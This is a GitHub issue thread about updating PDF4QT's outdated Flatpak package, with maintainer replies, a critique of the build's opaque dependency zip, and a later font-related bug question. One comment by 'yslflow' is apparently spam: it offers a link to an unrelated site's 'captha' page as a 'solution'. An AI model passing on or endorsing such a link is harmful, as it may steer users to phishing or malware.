### ISSUE TITLE
Please update the version of PDF4QT on Flathub / Flatpak

### ISSUE THREAD

**Issue by GerryT11** [JakubMelka/PDF4QT#212]
I would like to try PDF4QT, but there are no .deb files, nor is the recent version on Flathub.

Flathub still shows the version 1.3.7. Please update it there to the most recent version. 
Is there anywhere a .deb file available? 

Thank you very much!

**Comment by JakubMelka** [comment]
I will try to update the Flatpak package. .deb will not be available.

**Comment by GerryT11** [comment]
Thank you!

**Comment by yslflow** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by Aqua1ung** [comment]
Any news on this front?

**Comment by JakubMelka** [comment]
Hello @Aqua1ung, I have problem - I do not have a linux and I use an virtual machine. Also, I must write a new script from scratch, that will build flatpak. If someone wants to help, I will apreciate it.

**Comment by Aqua1ung** [comment]
> Hello @Aqua1ung, I have problem - I do not have a linux and I use an virtual machine. Also, I must write a new script from scratch, that will build flatpak. If someone wants to help, I will apreciate it.

I wish I could help, but I've never built a flatpak before. Moreover, my Linux distro is rather exotic, so I may have trouble installing PDF4QT form source code. At any rate, I will attempt to look into it, but do not rely on me for that.

And many thanks for doing a great job for this wonderful piece of software!

**Comment by dreua** [comment]
I saw a request for help on Mastodon and had a quick look. It seems like all the dependencies come from one zip file: https://github.com/JakubMelka/flathub/releases/download/v1/pdf4qt_vcpkg_loc.zip

I don't see how this is created and honestly that does not look like proper packaging to me, because it can't be  verified and maintained by other developers.

So in my opinion the first step would be to replace this magic zip file with source downloads in the flatpak manifest. To do that, it would be helpful to know how the zip can be recreated independently or how it was created in the first place. (Also, the dependencies in the zip are probably outdated. There may or may not be security fixes in the meantime, who knows?)

I'm not sure I can commit the time to do this properly (and my laptop takes ages to compile everything) but I'll leave this information here anyway in the hope that it may be useful. :wink:

**Comment by JakubMelka** [comment]
Thank you. I was successfull to compile some libraries. I am now trying to compile the main program.

**Comment by GerryT11** [comment]
Thank you very much! I installed the new Flatpak (on Ubuntu 24.4) and it works great: Installation is fine. The progamme icons are correctly installed. PDF4QT starts perfectly and I can open PDFs. All looks good. Only when I tried "Tools" -> "Editor" -> "Edit Page Content", I've got the following error message. However, I guess that it has nothing to do with the Flatpak?!?
![Screenshot from 2024-12-07 21-30-06](https://github.com/user-attachments/assets/59c8d34a-e7ac-4b6b-8438-6f6cfcb28272)

**Comment by JakubMelka** [comment]
Hello @GerryT11, no, it has nothing to do with flatpak. It means, that character is not available in the current font.

**Comment by GerryT11** [comment]
> Hello @GerryT11, no, it has nothing to do with flatpak. It means, that character is not available in the current font.

Does this mean that I can replace text in PDFs only, if the exact characters of the specific font are somewhere in the PDF otherwise? Example, if I have a document using "Courier New" which contains only the sentence "This is a test", the I cannot replace it in PDF4QT with "This was a test", because "w" and "a" are not present in the PDF? However, I could change it to "This is his test", because all needed characters were already embedded in the PDF. Does it have anything to do which fonts are installed on a system or just which characters of a font are embedded in the PDF?
